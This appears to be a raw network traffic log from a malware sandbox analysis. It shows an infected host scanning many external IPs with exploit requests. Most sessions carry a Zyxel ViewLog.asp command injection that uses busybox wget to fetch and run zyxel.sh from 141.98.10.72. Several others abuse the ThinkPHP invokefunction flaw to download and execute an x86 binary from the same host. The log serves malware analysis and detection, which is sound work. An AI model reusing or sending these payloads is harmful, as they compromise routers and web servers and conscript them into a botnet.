                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        542192.168.2.144211285.72.131.2188080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:34:09.083576918 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:34:09.329931021 CET548INHTTP/1.1 400 Bad Request
                                                        Date: Wed, 14 Feb 2024 08:34:03 GMT
                                                        Server:
                                                        X-Frame-Options: SAMEORIGIN
                                                        Content-Security-Policy: script-src 'self' 'unsafe-inline' 'unsafe-eval' ; object-src 'self' ; worker-src 'self' blob:
                                                        Content-Length: 226
                                                        Connection: close
                                                        Content-Type: text/html; charset=iso-8859-1
                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        543192.168.2.145259494.122.117.998080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:34:09.086429119 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        544192.168.2.144660862.29.28.1718080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:34:09.087887049 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        545192.168.2.143340494.122.22.2468080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:34:09.088007927 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        546192.168.2.144142694.187.104.2408080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:34:09.093085051 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:34:10.406553030 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        547192.168.2.143494294.25.7.2228080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:34:09.125256062 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:34:09.456410885 CET192INHTTP/1.1 404 Not found
                                                        Connection: close
                                                        Content-Type: text/html
                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 31 30 30 70 78 22 3e 3c 62 3e 34 30 34 3c 2f 62 3e 20 d4 e0 e9 eb 20 ed e5 20 ed e0 e9 e4 e5 ed 3c 70 3e 3c 61 20 68 72 65 66 3d 22 2f 22 3e cf e5 f0 e5 e9 f2 e8 20 ed e0 20 e3 eb e0 e2 ed f3 fe 20 f1 f2 f0 e0 ed e8 f6 f3 3c 2f 61 3e 3c 2f 70 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                        Data Ascii: <html><body style="margin:100px"><b>404</b> <p><a href="/"> </a></p></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        548192.168.2.144312031.24.86.968080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:34:09.127356052 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:34:13.350250006 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:34:19.494002104 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:34:31.525655985 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:34:55.588519096 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:35:44.738717079 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        549192.168.2.1458438112.25.25.16180
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:34:09.292602062 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Feb 14, 2024 09:34:09.683156013 CET361INHTTP/1.1 400 Bad Request
                                                        Server: openresty
                                                        Date: Wed, 14 Feb 2024 08:34:09 GMT
                                                        Content-Type: text/html
                                                        Content-Length: 154
                                                        Connection: close
                                                        Request-Id: 65cc7b01e7d25cdd314e67c216f386d2
                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>openresty</center></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        550192.168.2.145608294.120.1.2058080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:34:09.331346989 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        551192.168.2.145463494.120.220.338080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:34:09.331425905 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        552192.168.2.145762894.110.124.2248080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:34:09.492702007 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        553192.168.2.145583895.111.245.1048080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:34:09.493119001 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        554192.168.2.143330695.216.101.17780
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:34:09.511746883 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Feb 14, 2024 09:34:09.730644941 CET502INHTTP/1.1 400 Bad Request
                                                        Content-Type: text/html; charset=us-ascii
                                                        Server: Microsoft-HTTPAPI/2.0
                                                        Date: Wed, 14 Feb 2024 08:34:09 GMT
                                                        Connection: close
                                                        Content-Length: 311
                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 30 2e 20 54 68 65 20 72 65 71 75 65 73 74 20 69 73 20 62 61 64 6c 79 20 66 6f 72 6d 65 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Bad Request</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Bad Request</h2><hr><p>HTTP Error 400. The request is badly formed.</p></BODY></HTML>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        555192.168.2.145133495.216.184.7180
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:34:09.517334938 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Feb 14, 2024 09:34:09.742533922 CET307INHTTP/1.1 400 Bad Request
                                                        Server: nginx
                                                        Date: Wed, 14 Feb 2024 08:34:09 GMT
                                                        Content-Type: text/html
                                                        Content-Length: 150
                                                        Connection: close
                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        556192.168.2.144822894.123.114.2488080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:34:09.573385000 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        557192.168.2.145678894.187.102.208080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:34:09.583333969 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        558192.168.2.145134431.208.237.1178080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:34:09.768425941 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        559192.168.2.143701685.113.70.2518080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:34:10.097532034 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:34:10.371433020 CET627INHTTP/1.1 404
                                                        Content-Type: text/html;charset=utf-8
                                                        Content-Language: en
                                                        Content-Length: 431
                                                        Date: Wed, 14 Feb 2024 08:34:10 GMT
